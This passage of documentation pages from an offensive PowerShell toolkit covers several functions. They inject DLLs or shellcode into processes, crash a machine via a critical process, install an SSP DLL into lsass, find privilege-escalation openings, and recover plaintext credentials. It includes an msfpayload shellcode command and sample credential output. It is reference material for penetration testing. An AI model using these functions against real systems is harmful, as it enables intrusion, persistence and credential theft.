34 | Inject 'evil.dll' into process ID 4274.
35 |
36 | ## PARAMETERS
37 |
38 | ### -ProcessID
39 | Process ID of the process you want to inject a Dll into.
40 |
41 | ```yaml
42 | Type: Int32
43 | Parameter Sets: (All)
44 | Aliases:
45 |
46 | Required: True
47 | Position: 1
48 | Default value: 0
49 | Accept pipeline input: False
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Dll
54 | Name of the dll to inject.
55 | This can be an absolute or relative path.
56 |
57 | ```yaml
58 | Type: String
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: True
63 | Position: 2
64 | Default value: None
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ## NOTES
74 | Use the '-Verbose' option to print detailed information.
75 |
76 | ## RELATED LINKS
77 |
78 | [http://www.exploit-monday.com](http://www.exploit-monday.com)
79 |
80 |
--------------------------------------------------------------------------------
/docs/CodeExecution/Invoke-Shellcode.md:
--------------------------------------------------------------------------------
1 | # Invoke-Shellcode
2 |
3 | ## SYNOPSIS
4 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
5 |
6 | PowerSploit Function: Invoke-Shellcode
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
16 | ```
17 |
18 | ## DESCRIPTION
Portions of this project were based upon syringe.c v1.2 written by Spencer McIntyre
20 |
21 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk); note that msfpayload has since been retired in favour of msfvenom:
23 |
24 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-
25 |
26 | Make sure to specify 'thread' for your exit process.
27 | Also, don't bother encoding your shellcode.
28 | It's entirely unnecessary.
29 |
30 | ## EXAMPLES
31 |
32 | ### -------------------------- EXAMPLE 1 --------------------------
33 | ```
34 | Invoke-Shellcode -ProcessId 4274
35 | ```
36 |
37 | Description
38 | -----------
39 | Inject shellcode into process ID 4274.
40 |
41 | ### -------------------------- EXAMPLE 2 --------------------------
42 | ```
43 | Invoke-Shellcode
44 | ```
45 |
46 | Description
47 | -----------
48 | Inject shellcode into the running instance of PowerShell.
49 |
50 | ### -------------------------- EXAMPLE 3 --------------------------
51 | ```
52 | Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
53 | ```
54 |
55 | Description
56 | -----------
57 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
Warning: This script has no way to validate that your shellcode is 32- vs. 64-bit!
60 |
61 | ## PARAMETERS
62 |
63 | ### -ProcessID
Process ID of the process you want to inject shellcode into. The parameter is typed UInt16, so process IDs above 65535 cannot be passed.
65 |
66 | ```yaml
67 | Type: UInt16
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: 0
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ### -Shellcode
79 | Specifies an optional shellcode passed in as a byte array
80 |
81 | ```yaml
82 | Type: Byte[]
83 | Parameter Sets: (All)
84 | Aliases:
85 |
86 | Required: False
87 | Position: Named
88 | Default value: None
89 | Accept pipeline input: False
90 | Accept wildcard characters: False
91 | ```
92 |
93 | ### -Force
94 | Injects shellcode without prompting for confirmation.
95 | By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
96 |
97 | ```yaml
98 | Type: SwitchParameter
99 | Parameter Sets: (All)
100 | Aliases:
101 |
102 | Required: False
103 | Position: Named
104 | Default value: False
105 | Accept pipeline input: False
106 | Accept wildcard characters: False
107 | ```
108 |
109 | ## INPUTS
110 |
111 | ## OUTPUTS
112 |
113 | ## NOTES
114 |
115 | ## RELATED LINKS
116 |
117 |
--------------------------------------------------------------------------------
/docs/Mayhem/Set-CriticalProcess.md:
--------------------------------------------------------------------------------
1 | # Set-CriticalProcess
2 |
3 | ## SYNOPSIS
4 | Causes your machine to blue screen upon exiting PowerShell.
5 |
6 | PowerSploit Function: Set-CriticalProcess
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
16 | ```
17 |
18 | ## DESCRIPTION
Marks the running PowerShell process as a critical process, so that the machine blue screens when that process exits. Confirmation is requested before the process is marked unless -Force is supplied.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Set-CriticalProcess
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Set-CriticalProcess -ExitImmediately
31 | ```
32 |
33 | ### -------------------------- EXAMPLE 3 --------------------------
34 | ```
35 | Set-CriticalProcess -Force -Verbose
36 | ```
37 |
38 | ## PARAMETERS
39 |
40 | ### -Force
41 | Set the running PowerShell process as critical without asking for confirmation.
42 |
43 | ```yaml
44 | Type: SwitchParameter
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: False
49 | Position: Named
50 | Default value: False
51 | Accept pipeline input: False
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -ExitImmediately
56 | Immediately exit PowerShell after successfully marking the process as critical.
57 |
58 | ```yaml
59 | Type: SwitchParameter
60 | Parameter Sets: (All)
61 | Aliases:
62 |
63 | Required: False
64 | Position: Named
65 | Default value: False
66 | Accept pipeline input: False
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -WhatIf
71 | Shows what would happen if the cmdlet runs.
72 | The cmdlet is not run.
73 |
74 | ```yaml
75 | Type: SwitchParameter
76 | Parameter Sets: (All)
77 | Aliases: wi
78 |
79 | Required: False
80 | Position: Named
81 | Default value: None
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ### -Confirm
87 | Prompts you for confirmation before running the cmdlet.
88 |
89 | ```yaml
90 | Type: SwitchParameter
91 | Parameter Sets: (All)
92 | Aliases: cf
93 |
94 | Required: False
95 | Position: Named
96 | Default value: None
97 | Accept pipeline input: False
98 | Accept wildcard characters: False
99 | ```
100 |
101 | ## INPUTS
102 |
103 | ## OUTPUTS
104 |
105 | ## NOTES
106 |
107 | ## RELATED LINKS
108 |
109 |
--------------------------------------------------------------------------------
/docs/Persistence/Get-SecurityPackage.md:
--------------------------------------------------------------------------------
1 | # Get-SecurityPackage
2 |
3 | ## SYNOPSIS
4 | Enumerates all loaded security packages (SSPs).
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-SecurityPackage
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
19 | It also parses the returned SecPkgInfo struct array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-SecurityPackage
26 | ```
27 |
28 | ## PARAMETERS
29 |
30 | ## INPUTS
31 |
32 | ## OUTPUTS
33 |
34 | ## NOTES
35 |
36 | ## RELATED LINKS
37 |
38 |
--------------------------------------------------------------------------------
/docs/Persistence/Install-SSP.md:
--------------------------------------------------------------------------------
1 | # Install-SSP
2 |
3 | ## SYNOPSIS
4 | Installs a security support provider (SSP) dll.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
Install-SSP [[-Path] <String>]
15 | ```
16 |
17 | ## DESCRIPTION
Install-SSP installs an SSP dll.
Installation involves copying the dll to
%windir%\System32 and adding the name of the dll to
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
Both locations are writable only by administrators, so the function must be run from an elevated context.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Install-SSP -Path .\mimilib.dll
28 | ```
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
Path to the SSP dll to install. The file is copied to %windir%\System32 and registered under the Security Packages value by file name.
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases:
39 |
40 | Required: False
41 | Position: 1
42 | Default value: None
43 | Accept pipeline input: False
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ## NOTES
52 | The SSP dll must match the OS architecture.
53 | i.e.
54 | You must have a 64-bit SSP dll
55 | if you are running a 64-bit OS.
56 | In order for the SSP dll to be loaded properly
57 | into lsass, the dll must export SpLsaModeInitialize.
58 |
59 | ## RELATED LINKS
60 |
61 |
--------------------------------------------------------------------------------
/docs/Privesc/Add-ServiceDacl.md:
--------------------------------------------------------------------------------
1 | # Add-ServiceDacl
2 |
3 | ## SYNOPSIS
4 | Adds a Dacl field to a service object returned by Get-Service.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
Add-ServiceDacl [-Name] <String[]>
14 | ```
15 |
16 | ## DESCRIPTION
Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
Dacl field to each object.
It does this by opening a handle with ReadControl for the
service using the GetServiceHandle Win32 API call and then uses
QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-Service | Add-ServiceDacl
28 | ```
29 |
30 | Add Dacls for every service the current user can read.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service -Name VMTools | Add-ServiceDacl
35 | ```
36 |
37 | Add the Dacl to the VMTools service object.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to add a service Dacl for.
43 | Passable on the pipeline.
44 |
45 | ```yaml
46 | Type: String[]
47 | Parameter Sets: (All)
48 | Aliases: ServiceName
49 |
50 | Required: True
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByPropertyName, ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ## INPUTS
58 |
59 | ## OUTPUTS
60 |
61 | ### ServiceProcess.ServiceController
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
68 |
69 |
--------------------------------------------------------------------------------
/docs/Privesc/Find-PathDLLHijack.md:
--------------------------------------------------------------------------------
1 | # Find-PathDLLHijack
2 |
3 | ## SYNOPSIS
4 | Finds all directories in the system %PATH% that are modifiable by the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Find-PathDLLHijack
14 | ```
15 |
16 | ## DESCRIPTION
Enumerates the paths stored in Env:Path (%PATH%) and filters each through Get-ModifiablePath
to return the folder paths the current user can write to.
On Windows 7, if wlbsctrl.dll is
written to one of these paths, execution of the IKEEXT service can be hijacked due to DLL search
order loading.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Find-PathDLLHijack
28 | ```
29 |
30 | Finds all %PATH% .DLL hijacking opportunities.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.HijackableDLL.Path
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ApplicationHost.md:
--------------------------------------------------------------------------------
1 | # Get-ApplicationHost
2 |
3 | ## SYNOPSIS
4 | Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
5 |
6 | Author: Scott Sutherland
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ApplicationHost
14 | ```
15 |
16 | ## DESCRIPTION
This script will decrypt and recover application pool and virtual directory passwords
from the applicationHost.config file on the system.
The output supports the
pipeline and can be piped to Format-Table to render all of the results as a table.
The returned objects contain plaintext credentials; treat the output as sensitive.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
```
Get-ApplicationHost
```

Return application pool and virtual directory passwords from the applicationHost.config on the system.
31 |
32 | user : PoolUser1
33 | pass : PoolParty1!
34 | type : Application Pool
35 | vdir : NA
36 | apppool : ApplicationPool1
37 | user : PoolUser2
38 | pass : PoolParty2!
39 | type : Application Pool
40 | vdir : NA
41 | apppool : ApplicationPool2
42 | user : VdirUser1
43 | pass : VdirPassword1!
44 | type : Virtual Directory
45 | vdir : site1/vdir1/
46 | apppool : NA
47 | user : VdirUser2
48 | pass : VdirPassword2!
49 | type : Virtual Directory
50 | vdir : site2/
51 | apppool : NA
52 |
53 | ### -------------------------- EXAMPLE 2 --------------------------
```
Get-ApplicationHost | Format-Table -Autosize
```

Return application pool and virtual directory passwords from the applicationHost.config as an auto-sized table.
59 |
60 | user pass type vdir apppool
61 | ---- ---- ---- ---- -------
62 | PoolUser1 PoolParty1!
63 | Application Pool NA ApplicationPool1
64 | PoolUser2 PoolParty2!
65 | Application Pool NA ApplicationPool2
66 | VdirUser1 VdirPassword1!
67 | Virtual Directory site1/vdir1/ NA
68 | VdirUser2 VdirPassword2!
69 | Virtual Directory site2/ NA
70 |
71 | ## PARAMETERS
72 |
73 | ## INPUTS
74 |
75 | ## OUTPUTS
76 |
77 | ### System.Data.DataTable
78 |
79 | System.Boolean
80 |
81 | ## NOTES
82 | Author: Scott Sutherland - 2014, NetSPI
83 | Version: Get-ApplicationHost v1.0
84 | Comments: Should work on IIS 6 and Above
85 |
86 | ## RELATED LINKS
87 |
88 | [https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1)
89 | [http://www.netspi.com](http://www.netspi.com)
90 | [http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe](http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe)
91 | [http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)
95 |
96 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-CachedGPPPassword.md:
--------------------------------------------------------------------------------
1 | # Get-CachedGPPPassword
2 |
3 | ## SYNOPSIS
4 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and
5 | left in cached files on the host.
6 |
7 | Author: Chris Campbell (@obscuresec)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-CachedGPPPassword
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-CachedGPPPassword searches the local machine for cached groups.xml, scheduledtasks.xml, services.xml and
19 | datasources.xml files and returns the plaintext passwords they contain.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-CachedGPPPassword
26 | ```
27 |
28 | NewName : \[BLANK\]
29 | Changed : {2013-04-25 18:36:07}
30 | Passwords : {Super!!!Password}
31 | UserNames : {SuperSecretBackdoor}
32 | File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
33 | C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
34 | oups.xml
35 |
36 | ## PARAMETERS
37 |
38 | ## INPUTS
39 |
40 | ## OUTPUTS
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 | [http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html)
47 | [https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1](https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1)
48 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb)
49 | [http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences](http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences)
50 | [http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)
55 |
56 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiablePath.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiablePath
2 |
3 | ## SYNOPSIS
4 | Parses a passed string containing multiple possible file/folder paths and returns
5 | the file paths where the current user has modification rights.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiablePath [-Path] [-Literal]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes a complex path specification of an initial file/folder path with possible
19 | configuration files, 'tokenizes' the string in a number of possible ways, and
20 | enumerates the ACLs for each path that currently exists on the system.
21 | Any path that
22 | the current user has modification rights on is returned in a custom object that contains
23 | the modifiable path, associated permission set, and the IdentityReference with the specified
24 | rights.
25 | The SIDs of the current user and of every group the user belongs to are used as the
26 | comparison set against the DACLs of the parsed paths.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
33 | ```
34 |
35 | Path Permissions IdentityReference
36 | ---- ----------- -----------------
37 | C:\Temp\blah.exe {ReadAttributes, ReadCo...
38 | NT AUTHORITY\Authentic...
39 | C:\Temp\config.ini {ReadAttributes, ReadCo...
40 | NT AUTHORITY\Authentic...
41 |
42 | ### -------------------------- EXAMPLE 2 --------------------------
43 | ```
44 | Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
45 | ```
46 |
47 | Path Permissions IdentityReference
48 | ---- ----------- -----------------
49 | C:\Vuln\blah.bat {ReadAttributes, ReadCo...
50 | NT AUTHORITY\Authentic...
51 | C:\Vuln\config.ini {ReadAttributes, ReadCo...
52 | NT AUTHORITY\Authentic...
53 | ...
54 |
55 | ## PARAMETERS
56 |
57 | ### -Path
58 | The string path to parse for modifiable files.
59 | Required
60 |
61 | ```yaml
62 | Type: String[]
63 | Parameter Sets: (All)
64 | Aliases: FullName
65 |
66 | Required: True
67 | Position: 1
68 | Default value: None
69 | Accept pipeline input: True (ByPropertyName, ByValue)
70 | Accept wildcard characters: False
71 | ```
72 |
73 | ### -Literal
74 | Switch.
75 | Treat all paths as literal (i.e.
76 | don't do 'tokenization').
77 |
78 | ```yaml
79 | Type: SwitchParameter
80 | Parameter Sets: (All)
81 | Aliases: LiteralPaths
82 |
83 | Required: False
84 | Position: Named
85 | Default value: False
86 | Accept pipeline input: False
87 | Accept wildcard characters: False
88 | ```
89 |
90 | ## INPUTS
91 |
92 | ## OUTPUTS
93 |
94 | ### PowerUp.TokenPrivilege.ModifiablePath
95 |
96 | Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for
97 | a modifiable path.
98 |
99 | ## NOTES
100 |
101 | ## RELATED LINKS
102 |
103 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableRegistryAutoRun.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableRegistryAutoRun
2 |
3 | ## SYNOPSIS
4 | Returns any elevated system autoruns in which the current user can
5 | modify part of the path string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableRegistryAutoRun
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates a number of autorun specifications in HKLM and filters any
19 | autoruns through Get-ModifiablePath, returning any file/config locations
20 | in the found path strings that the current user can modify.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-ModifiableRegistryAutoRun
27 | ```
28 |
29 | Return vulnerable autorun binaries (or associated configs).
30 |
31 | ## PARAMETERS
32 |
33 | ## INPUTS
34 |
35 | ## OUTPUTS
36 |
37 | ### PowerUp.ModifiableRegistryAutoRun
38 |
39 | Custom PSObject containing results.
40 |
41 | ## NOTES
42 |
43 | ## RELATED LINKS
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableScheduledTaskFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableScheduledTaskFile
2 |
3 | ## SYNOPSIS
4 | Returns scheduled tasks where the current user can modify any file
5 | in the associated task action string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableScheduledTaskFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
19 | and parses the XML specification for each task, extracting the command triggers.
20 | Each trigger string is filtered through Get-ModifiablePath, returning any file/config
21 | locations in the found path strings that the current user can modify.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ModifiableScheduledTaskFile
28 | ```
29 |
30 | Return scheduled tasks with modifiable command strings.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.ModifiableScheduledTaskFile
39 |
40 | Custom PSObject containing results.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableService.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableService
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns services for which the current user can modify the binPath.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableService
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
18 | the current user has rights to change the service configuration.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ModifiableService
25 | ```
26 |
27 | Get a set of potentially exploitable services.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.ModifiablePath
36 |
37 | ## NOTES
38 |
39 | ## RELATED LINKS
40 |
41 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableServiceFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableServiceFile
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns vulnerable service files.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableServiceFile
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services by querying the WMI win32_service class.
18 | For each service,
19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
20 | if the current user has rights to modify the service binary itself or any associated
21 | arguments.
22 | If the associated binary (or any configuration files) can be overwritten,
23 | privileges may be able to be escalated.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Get-ModifiableServiceFile
30 | ```
31 |
32 | Get a set of potentially exploitable service binaries/config files.
33 |
34 | ## PARAMETERS
35 |
36 | ## INPUTS
37 |
38 | ## OUTPUTS
39 |
40 | ### PowerUp.ModifiablePath
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-RegistryAlwaysInstallElevated.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAlwaysInstallElevated
2 |
3 | ## SYNOPSIS
4 | Checks if any of the AlwaysInstallElevated registry keys are set.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAlwaysInstallElevated
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
19 | are set, $False otherwise.
20 | If either of these keys is set, then all .MSI files run with
21 | elevated permissions, regardless of the current user's permissions.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-RegistryAlwaysInstallElevated
28 | ```
29 |
30 | Returns $True if any of the AlwaysInstallElevated registry keys are set.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### System.Boolean
39 |
40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-RegistryAutoLogon.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAutoLogon
2 |
3 | ## SYNOPSIS
4 | Finds any autologon credentials left in the registry.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAutoLogon
14 | ```
15 |
16 | ## DESCRIPTION
17 | Checks if any autologon accounts/credentials are set in a number of registry locations.
18 | If they are, the credentials are extracted and returned as a custom PSObject.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-RegistryAutoLogon
25 | ```
26 |
27 | Finds any autologon credentials left in the registry.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.RegistryAutoLogon
36 |
37 | Custom PSObject containing autologin credentials found in the registry.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ServiceDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ServiceDetail
2 |
3 | ## SYNOPSIS
4 | Returns detailed information about a specified service by querying the
5 | WMI win32_service class for the specified service name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ServiceDetail [-Name]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes an array of one or more service names, or ServiceProcess.ServiceController objects
19 | returned by Get-Service on the pipeline, extracts the service name, queries the
20 | WMI win32_service class for the specified service for details like binPath, and outputs
21 | everything.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ServiceDetail -Name VulnSVC
28 | ```
29 |
30 | Gets detailed information about the 'VulnSVC' service.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Get-ServiceDetail
35 | ```
36 |
37 | Gets detailed information about the 'VulnSVC' service.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to query information for.
43 |
44 | ```yaml
45 | Type: String[]
46 | Parameter Sets: (All)
47 | Aliases: ServiceName
48 |
49 | Required: True
50 | Position: 1
51 | Default value: None
52 | Accept pipeline input: True (ByPropertyName, ByValue)
53 | Accept wildcard characters: False
54 | ```
55 |
56 | ## INPUTS
57 |
58 | ## OUTPUTS
59 |
60 | ### System.Management.ManagementObject
61 |
62 | ## NOTES
63 |
64 | ## RELATED LINKS
65 |
66 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-SiteListPassword.md:
--------------------------------------------------------------------------------
1 | # Get-SiteListPassword
2 |
3 | ## SYNOPSIS
4 | Retrieves the plaintext passwords from any McAfee SiteList.xml files found.
5 | Based on Jerome Nokin (@funoverip)'s Python solution (see links).
6 |
7 | Author: Jerome Nokin (@funoverip)
8 | PowerShell Port: @harmj0y
9 | License: BSD 3-Clause
10 | Required Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-SiteListPassword [[-Path] ]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
20 | C:\Documents and Settings\, or C:\Users\.
